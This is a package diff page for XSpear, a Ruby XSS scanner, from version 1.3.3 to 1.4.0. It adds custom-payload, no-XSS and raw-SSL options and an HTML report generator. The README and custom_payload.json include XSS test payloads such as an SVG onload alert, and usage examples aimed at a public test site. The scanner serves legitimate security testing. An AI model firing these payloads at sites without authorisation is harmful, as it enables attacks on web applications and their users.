RubyGems - XSpear - Versions diffs - 1.3.3 → 1.4.0 - Mend

XSpear 1.3.3 → 1.4.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11) hide show

checksums.yaml +4 -4
data/.idea/workspace.xml +144 -115
data/README.md +37 -2
data/XSpear-1.3.3.gem +0 -0
data/custom_payload.json +17 -0
data/exe/XSpear +25 -3
data/lib/XSpear/XSpearRepoter.rb +352 -3
data/lib/XSpear/version.rb +1 -1
data/lib/XSpear.rb +86 -48
metadata +4 -3
data/XSpear-1.3.2.gem +0 -0

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: afb284c2c76350733a45156127bde1e8fd996a6aabf985b3eef8a1b43e8147a7
-  data.tar.gz: f4411c5bdfb84d3ad32a87f34e1ffcd98a7ead48761b07134fcc82f5ded53f5b
+  metadata.gz: 32c726b87b11934044cacd01471bedab0f407185be09ba5018ec7f127d2f111d
+  data.tar.gz: 1faaf797b99c0e23a7280071c8cd9f010ff23c94dfd29d08edb116bb08b65b0e
 SHA512:
-  metadata.gz: e031af8d10adfcdb511df45e0e9a34c19df1fdcbfc4bdcaf9179c584f25cf66df9d805204b85a8ef3c108495fa663c6e78dcc861549532d48556b867c9e5f65e
-  data.tar.gz: 9dcd8c46a718c459ab7d2b8ebc8a8e4e9181a51d7d0c1c4280219bd3502caa16ea48cbfeb6a3ca02a6fc21d226606801a704ba77824d89bcd07150c3833d3cd8
+  metadata.gz: 607af7c1efc237340f376e87a603f5d0f8715de74d0dfa85ca139d1f85406dd3fc2f839b75cb4e9681c2ee3c63e7ced219d1364bc61de7717506a5c63c13c76e
+  data.tar.gz: 8d5e0667c104e834e3ea7a87ed9f4a79eca542dbc7c039083fc5c425a40460bc960db03f1aa65bc8522a44a0d0d8e6a55f8736f9da721e6445bca88656f61d27

data/.idea/workspace.xml CHANGED Viewed

@@ -3,6 +3,8 @@
   <component name="ChangeListManager">
     <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
       <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
     </list>
     <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -19,29 +21,26 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/exe/XSpear">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="900">
-              <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
+            <state relative-caret-position="1084">
+              <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/README.md">
-          <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
-            <state split_layout="SPLIT">
-              <first_editor relative-caret-position="6840">
-                <caret line="456" column="38" selection-start-line="456" selection-start-column="38" selection-end-line="456" selection-end-column="38" />
-              </first_editor>
-              <second_editor />
+        <entry file="file://$PROJECT_DIR$/raw_sample.txt">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="30">
+              <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="false">
+      <file pinned="false" current-in-tab="true">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="1095">
-              <caret line="73" selection-start-line="73" selection-end-line="73" />
+            <state relative-caret-position="217">
+              <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
             </state>
           </provider>
         </entry>
@@ -49,31 +48,35 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="316">
-              <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
+            <state relative-caret-position="260">
+              <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
             </state>
           </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/bin/console">
-          <provider selected="true" editor-type-id="text-editor" />
+        <entry file="file://$PROJECT_DIR$/report.html">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="75">
+              <caret line="5" selection-start-line="5" selection-end-line="5" />
+            </state>
+          </provider>
         </entry>
       </file>
       <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
+        <entry file="file://$PROJECT_DIR$/custom_payload.json">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="195">
-              <caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
+            <state relative-caret-position="150">
+              <caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="true">
+      <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
           <provider selected="true" editor-type-id="text-editor">
             <state relative-caret-position="15">
-              <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+              <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
             </state>
           </provider>
         </entry>
@@ -113,7 +116,6 @@
   <component name="FindInProjectRecents">
     <findStrings>
       <find>BLINDNOTDETECTED</find>
-      <find>@all</find>
       <find>@reflected_params</find>
       <find>@thread</find>
       <find>thread</find>
@@ -126,6 +128,8 @@
       <find>EH</find>
       <find>CSP</find>
       <find>URI::encode</find>
+      <find>@all</find>
+      <find>for reflected</find>
     </findStrings>
   </component>
   <component name="Git.Settings">
@@ -135,24 +139,27 @@
     <option name="CHANGED_PATHS">
       <list>
         <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
-        <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
         <option value="$PROJECT_DIR$/config.json" />
         <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
-        <option value="$PROJECT_DIR$/exe/XSpear" />
         <option value="$PROJECT_DIR$/README.md" />
         <option value="$PROJECT_DIR$/XSpear.gemspec" />
         <option value="$PROJECT_DIR$/forBurp/otwa.sh" />
         <option value="$PROJECT_DIR$/forBurp/README.md" />
-        <option value="$PROJECT_DIR$/lib/XSpear.rb" />
+        <option value="$PROJECT_DIR$/raw_sample.txt" />
+        <option value="$PROJECT_DIR$/exe/XSpear" />
+        <option value="$PROJECT_DIR$/report.html" />
+        <option value="$PROJECT_DIR$/custom_payload.json" />
         <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
+        <option value="$PROJECT_DIR$/lib/XSpear.rb" />
+        <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
       </list>
     </option>
   </component>
-  <component name="ProjectFrameBounds">
+  <component name="ProjectFrameBounds" extendedState="6">
     <option name="x" value="-1920" />
-    <option name="y" value="-620" />
+    <option name="y" value="-643" />
     <option name="width" value="1920" />
-    <option name="height" value="1057" />
+    <option name="height" value="1080" />
   </component>
   <component name="ProjectLevelVcsManager" settingsEditedManually="true">
     <ConfirmationsSetting value="2" id="Add" />
@@ -162,6 +169,7 @@
       <foldersAlwaysOnTop value="true" />
     </navigator>
     <panes>
+      <pane id="Scope" />
       <pane id="ProjectPane">
         <subPane>
           <expand>
@@ -199,7 +207,6 @@
           <select />
         </subPane>
       </pane>
-      <pane id="Scope" />
     </panes>
   </component>
   <component name="PropertiesComponent">
@@ -266,63 +273,8 @@
       <workItem from="1577115206395" duration="21990000" />
       <workItem from="1580314696983" duration="286000" />
       <workItem from="1580583824837" duration="1470000" />
-      <workItem from="1581089876742" duration="268000" />
-    </task>
-    <task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
-      <created>1563893769120</created>
-      <option name="number" value="00030" />
-      <option name="presentableId" value="LOCAL-00030" />
-      <option name="project" value="LOCAL" />
-      <updated>1563893769120</updated>
-    </task>
-    <task id="LOCAL-00031" summary="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정">
-      <created>1563893901111</created>
-      <option name="number" value="00031" />
-      <option name="presentableId" value="LOCAL-00031" />
-      <option name="project" value="LOCAL" />
-      <updated>1563893901111</updated>
-    </task>
-    <task id="LOCAL-00032" summary="(1.0.6)[fixed #4] Report 객체 수정">
-      <created>1563894048747</created>
-      <option name="number" value="00032" />
-      <option name="presentableId" value="LOCAL-00032" />
-      <option name="project" value="LOCAL" />
-      <updated>1563894048747</updated>
-    </task>
-    <task id="LOCAL-00033" summary="(1.0.6)[fixed #8] Added response header analysis module">
-      <created>1563894186608</created>
-      <option name="number" value="00033" />
-      <option name="presentableId" value="LOCAL-00033" />
-      <option name="project" value="LOCAL" />
-      <updated>1563894186608</updated>
-    </task>
-    <task id="LOCAL-00034" summary="(1.0.6)[fixed #9] Added method in report-cli">
-      <created>1563894430592</created>
-      <option name="number" value="00034" />
-      <option name="presentableId" value="LOCAL-00034" />
-      <option name="project" value="LOCAL" />
-      <updated>1563894430592</updated>
-    </task>
-    <task id="LOCAL-00035" summary="(1.0.6) Edit report &amp; scanning format">
-      <created>1563895638242</created>
-      <option name="number" value="00035" />
-      <option name="presentableId" value="LOCAL-00035" />
-      <option name="project" value="LOCAL" />
-      <updated>1563895638242</updated>
-    </task>
-    <task id="LOCAL-00036" summary="(1.0.6)[fixed #5] Add blind-xss other pattern">
-      <created>1563895850670</created>
-      <option name="number" value="00036" />
-      <option name="presentableId" value="LOCAL-00036" />
-      <option name="project" value="LOCAL" />
-      <updated>1563895850670</updated>
-    </task>
-    <task id="LOCAL-00037" summary="(1.0.6) Releases 1.0.6 version">
-      <created>1563896026689</created>
-      <option name="number" value="00037" />
-      <option name="presentableId" value="LOCAL-00037" />
-      <option name="project" value="LOCAL" />
-      <updated>1563896026689</updated>
+      <workItem from="1581089876742" duration="615000" />
+      <workItem from="1581425741728" duration="13911000" />
     </task>
     <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
       <created>1563896886094</created>
@@ -611,11 +563,67 @@
       <option name="project" value="LOCAL" />
       <updated>1581090128596</updated>
     </task>
-    <option name="localTasksCounter" value="79" />
+    <task id="LOCAL-00079" summary="Release 1.3.3 (Added New XSS Payloads)">
+      <created>1581090457081</created>
+      <option name="number" value="00079" />
+      <option name="presentableId" value="LOCAL-00079" />
+      <option name="project" value="LOCAL" />
+      <updated>1581090457081</updated>
+    </task>
+    <task id="LOCAL-00080" summary="(1.4 / Closed #51) Added only param analysis options">
+      <created>1581426071038</created>
+      <option name="number" value="00080" />
+      <option name="presentableId" value="LOCAL-00080" />
+      <option name="project" value="LOCAL" />
+      <updated>1581426071038</updated>
+    </task>
+    <task id="LOCAL-00081" summary="(1.4 / Closed #51) Added only param analysis options">
+      <created>1581427060990</created>
+      <option name="number" value="00081" />
+      <option name="presentableId" value="LOCAL-00081" />
+      <option name="project" value="LOCAL" />
+      <updated>1581427060990</updated>
+    </task>
+    <task id="LOCAL-00082" summary="(1.4 / Closed #41) Added custom payload option">
+      <created>1581428107580</created>
+      <option name="number" value="00082" />
+      <option name="presentableId" value="LOCAL-00082" />
+      <option name="project" value="LOCAL" />
+      <updated>1581428107580</updated>
+    </task>
+    <task id="LOCAL-00083" summary="(1.4 / Closed #41) Added custom payload option">
+      <created>1581428482520</created>
+      <option name="number" value="00083" />
+      <option name="presentableId" value="LOCAL-00083" />
+      <option name="project" value="LOCAL" />
+      <updated>1581428482520</updated>
+    </task>
+    <task id="LOCAL-00084" summary="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl">
+      <created>1581430796984</created>
+      <option name="number" value="00084" />
+      <option name="presentableId" value="LOCAL-00084" />
+      <option name="project" value="LOCAL" />
+      <updated>1581430796984</updated>
+    </task>
+    <task id="LOCAL-00085" summary="(1.4 / Closed #52) Added HTML Report">
+      <created>1581529060550</created>
+      <option name="number" value="00085" />
+      <option name="presentableId" value="LOCAL-00085" />
+      <option name="project" value="LOCAL" />
+      <updated>1581529060550</updated>
+    </task>
+    <task id="LOCAL-00086" summary="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정">
+      <created>1581530432559</created>
+      <option name="number" value="00086" />
+      <option name="presentableId" value="LOCAL-00086" />
+      <option name="project" value="LOCAL" />
+      <updated>1581530432559</updated>
+    </task>
+    <option name="localTasksCounter" value="87" />
     <servers />
   </component>
   <component name="TimeTrackingManager">
-    <option name="totallyTimeSpent" value="76057000" />
+    <option name="totallyTimeSpent" value="90315000" />
   </component>
   <component name="TodoView">
     <todo-panel id="selected-file">
@@ -627,10 +635,10 @@
     </todo-panel>
   </component>
   <component name="ToolWindowManager">
-    <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
+    <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
     <editor active="true" />
     <layout>
-      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.1368477" />
+      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13791268" />
       <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
       <window_info id="Favorites" order="2" side_tool="true" />
       <window_info anchor="bottom" id="Message" order="0" />
@@ -656,12 +664,6 @@
     <option name="version" value="1" />
   </component>
   <component name="VcsManagerConfiguration">
-    <MESSAGE value="(1.1.1) Add code level function &amp; Check WAF code frame" />
-    <MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
-    <MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
-    <MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
-    <MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
-    <MESSAGE value="(1.1.4) Released 1.1.4" />
     <MESSAGE value="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix" />
     <MESSAGE value="(1.1.5) Released 1.1.5" />
     <MESSAGE value="(1.1.6) (Fixed #24) Edit Usage" />
@@ -681,7 +683,13 @@
     <MESSAGE value="Released 1.3.2" />
     <MESSAGE value="(Fixed #49) Add onpointerrawupdate event handler for xss" />
     <MESSAGE value="(Fixed #50) Add SVG Animate XSS Payload" />
-    <option name="LAST_COMMIT_MESSAGE" value="(Fixed #50) Add SVG Animate XSS Payload" />
+    <MESSAGE value="Release 1.3.3 (Added New XSS Payloads)" />
+    <MESSAGE value="(1.4 / Closed #51) Added only param analysis options" />
+    <MESSAGE value="(1.4 / Closed #41) Added custom payload option" />
+    <MESSAGE value="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl" />
+    <MESSAGE value="(1.4 / Closed #52) Added HTML Report" />
+    <MESSAGE value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
+    <option name="LAST_COMMIT_MESSAGE" value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
   </component>
   <component name="editorHistoryManager">
     <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -741,13 +749,6 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/exe/XSpear">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="900">
-          <caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/README.md">
       <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
         <state split_layout="SPLIT">
@@ -758,13 +759,6 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="1095">
-          <caret line="73" selection-start-line="73" selection-end-line="73" />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/bin/console">
       <provider selected="true" editor-type-id="text-editor" />
     </entry>
@@ -799,17 +793,52 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+    <entry file="file://$PROJECT_DIR$/raw_sample.txt">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="316">
-          <caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
+        <state relative-caret-position="30">
+          <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/report.html">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="75">
+          <caret line="5" selection-start-line="5" selection-end-line="5" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/custom_payload.json">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="150">
+          <caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/exe/XSpear">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="1084">
+          <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
         </state>
       </provider>
     </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
       <provider selected="true" editor-type-id="text-editor">
         <state relative-caret-position="15">
-          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+          <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="260">
+          <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="217">
+          <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
         </state>
       </provider>
     </entry>

data/README.md CHANGED Viewed

@@ -33,12 +33,14 @@ XSpear is XSS Scanner on ruby gems
   + Reflected Params
   + All params(for blind xss, anytings)
   + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
+  + Testing custom payload for only you!
 - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
 - Dynamic/Static Analysis
   + Find SQL Error pattern
   + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
   + Analysis Other headers..(Server version, Content-Type, etc...)
   + XSS Testing to URI Path
+  + Testing Only Parameter Analysis (aka no-XSS mode)
 - Scanning from Raw file(Burp suite, ZAP Request)
 - XSpear running on ruby code(with Gem library)
 - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
@@ -90,14 +92,17 @@ $ gem install progress_bar
 Usage: xspear -u [target] -[options] [value]
 [ e.g ]
 $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a
-$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
+$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
+$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json
 [ Options ]
     -u, --url=target_URL             [required] Target Url
     -d, --data=POST Body             [optional] POST Method Body data
     -a, --test-all-params            [optional] test to all params(include not reflected)
+        --no-xss                     [optional] no testing xss, only parameters analysis
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
+        --custom-payload=FILENAME    [optional] Load custom payload json file
         --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
     -p, --param=PARAM                [optional] Test paramters
     -b, --BLIND=URL                  [optional] Add vector of Blind XSS
@@ -115,6 +120,7 @@ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
         --version                    Show XSpear version
         --update                     Show how to update
 ```
 ### Result types
 - (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
@@ -198,7 +204,6 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
 ```
 **Set scanning thread**
 ```
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
@@ -215,6 +220,11 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhah
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
 ```
+**Testing Only parameter analysis (aka no-xss mode)**<br>
+```
+$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss
+```
 **Testing blind xss(all params)**<br>
 (Should be used as much as possible because Blind XSS is everywhere)<br>
 ```
@@ -223,6 +233,31 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwu
 # Set your blind xss host. <-b options>
 ```
+**Testing custom payload**<br>
+```
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json
+```
+in custom_payload.json file
+```json
+[
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P2",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  }
+]
+```
 **for Pipeline**<br>
 ```
 $ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json

data/XSpear-1.3.3.gem ADDED Viewed

Binary file

data/custom_payload.json ADDED Viewed

@@ -0,0 +1,17 @@
+[
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<svg/onload=alert(1)>",
+    "callback":"P2",
+    "descript":"blahblah~"
+  },
+  {
+    "payload":"<>",
+    "callback":"P1",
+    "descript":"blahblah~"
+  }
+]

data/exe/XSpear CHANGED Viewed

@@ -3,6 +3,10 @@ require "XSpear"
 XOptions = Struct.new(:url, :data, :headers, :params, :options)
+def true?(obj)
+  obj.to_s.downcase == "true"
+end
 class Parser
   def self.parse(options)
     args = XOptions.new('xspear')
@@ -29,6 +33,10 @@ class Parser
         args.options['all'] = true
       end
+      opts.on('--no-xss', '[optional] no testing xss, only parameters analysis') do
+        args.options['nx'] = true
+      end
       opts.on('--headers=HEADERS', '[optional] Add HTTP Headers') do |n|
         args.options['headers'] = n
       end
@@ -38,11 +46,17 @@ class Parser
         args.options['cookie'] = 'Cookie: ' + n
       end
+      opts.on('--custom-payload=FILENAME', '[optional] Load custom payload json file') do |n|
+        args.options['cp'] = n
+      end
       opts.on('--raw=FILENAME', '[optional] Load raw file(e.g raw_sample.txt)') do |n|
         args.options['raw'] = n
       end
+      opts.on('--raw-ssl=BOOLEAN', '[optional] http/https switch for burp raw file e.g: true/false') do |n|
+        args.options['raw-ssl'] = n
+      end
       opts.on('-p', '--param=PARAM', '[optional] Test paramters') do |n|
         args.options['params'] = n
@@ -58,7 +72,7 @@ class Parser
       end
-      opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json)') do |n|
+      opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json, html)') do |n|
         args.options['output'] = n
       end
@@ -129,15 +143,23 @@ if !options.options['raw'].nil?
         end
       end
     end
     # Burp or ZAP
     # http, https로 시작하면 zap 아니면 burp 포맷
     url = ""
     if (path.index('http://') == 0 || path.index('https://') == 0)
       url = path
     else
-      url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
+      if options.options['raw-ssl'].nil?
+        url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
+      else
+        if true? options.options['raw-ssl']
+          url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
+        else
+          url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
+        end
+      end
     end
+    puts url
     options.url = url
     if headers.length > 0
       options.options['headers'] = headers

data/lib/XSpear/XSpearRepoter.rb CHANGED Viewed

@@ -1,4 +1,5 @@
 require 'terminal-table'
+require 'cgi'
 IssueStruct = Struct.new(:id, :type, :issue, :method, :param, :payload, :description)
 class IssueStruct
@@ -29,7 +30,7 @@ class XspearRepoter
     # desc
     # category
     # callback
-    @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".light_red}
+    @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MEDIUM".yellow,"h"=>"HIGH".light_red}
     @rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
   end
@@ -62,6 +63,356 @@ class XspearRepoter
     @endtime = Time.now
   end
+  def to_html
+    rurl = ""
+    if @url.length > 66
+      rurl = @url[0..66]+"... (snip)"
+    else
+      rurl = @url
+    end
+    t_info= "Testing to <a href='#{CGI.escapeHTML @url}'>#{CGI.escapeHTML rurl}</a><br>Found #{@issue.length} issues and running on #{@starttime} ~ #{@endtime} "
+    t_issue = ""
+    t_available = ""
+    t_rawquery = ""
+    @issue.each do |i|
+      i[1] = i[1].uncolorize
+      i[6] = i[6].uncolorize
+      # NO TYPE ISSUE METHOD PARAM PAYLOAD DESCRIPTION
+      t_issue = t_issue + "<tr class='#{i[1]} ISSUE'><td>#{i[0]}</td><td>#{i[1]}</td><td>#{CGI.escapeHTML i[2]}</td><td>#{i[3]}</td><td>#{CGI.escapeHTML i[4]}</td><td>#{CGI.escapeHTML i[5]}</td><td>#{CGI.escapeHTML i[6]}</td></tr>" #(i[0],i[1],i[2],i[3],i[4],i[5],i[6])
+    end
+    @filtered_objects.each do |key, value|
+      begin
+        eh = []
+        tag = []
+        sc = []
+        uc = []
+        t_available = t_available + "<code>#{key}</code> param<br>"
+        value.each do |n|
+          if n.include? "=64"
+            # eh
+            eh.push n.chomp("=64")
+          elsif n.include? "xsp<"
+            # tag
+            n = n.sub("xsp<","")
+            tag.push n.chomp(">")
+          elsif n.include? ".xspear"
+            # uc
+            uc.push n.sub(".xspear","")
+          else
+            # sc
+            sc.push n.sub("XsPeaR","")
+          end
+        end
+        as = ""#sc.map(&:inspect).join(',')
+        ae = ""#eh.map(&:inspect).join(',')
+        at = ""#tag.map(&:inspect).join(',')
+        ac = ""#uc.map(&:inspect).join(',')
+        sc.each do |z|
+          as = as + "<code>#{CGI.escapeHTML z}</code> "
+        end
+        eh.each do |z|
+          ae = ae + "<code>#{CGI.escapeHTML z}</code> "
+        end
+        tag.each do |z|
+          at = at + "<code>#{CGI.escapeHTML z}</code> "
+        end
+        uc.each do |z|
+          ac = ac + "<code>#{CGI.escapeHTML z}</code> "
+        end
+        t_available = t_available + """
+        <table>
+            <tr>
+                <td width='50%'>
+                    <table>
+                        <tr>
+                            <td>Category</td>
+                            <td>Data</td>
+                        </tr>
+                        <tr><td style='width:150px;'>HTML Tag</td><td>#{at}</td></tr>
+                        <tr><td style='width:150px;'>Useful Code</td><td>#{ac}</td></tr>
+                        <tr><td style='width:150px;'>Special Char</td><td>#{as}</td></tr>
+                    </table>
+                </td>
+                <td><table>
+                    <tr>
+                        <td>Category</td>
+                        <td>Data</td>
+                        <tr><td style='width:150px;'>Event Handler</td><td>#{ae}</td></tr>
+                    </tr>
+                </table>
+                </td>
+            </tr>
+        </table>
+        """
+      rescue
+      end
+    end
+    if @filtered_objects.length == 0
+    end
+    begin
+      @query.each_with_index do |q, i|
+        html_q = "#{@url.sub(URI.parse(@url).query,"")}"+q
+        t_rawquery = t_rawquery + "<li><a href='#{CGI.escapeHTML html_q}'>[#{i}] #{CGI.escapeHTML html_q}</a></li>"
+      end
+    rescue
+    end
+    report = """
+      <style>
+          @import url(https://fonts.googleapis.com/css?family=Lato:100,300,400,700);
+          @import url(https://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css);
+          html {
+              height: 100%;
+              font-family: 'Lato', sans-serif;
+              -webkit-user-select: none;
+              color:rgba(255, 255, 255, 0.4);
+          }
+          body {
+              height: 100%;
+              margin: 0;
+              background: #252C33;
+          }
+          * {
+              box-sizing: border-box;
+              word-break: keep-all;
+          }
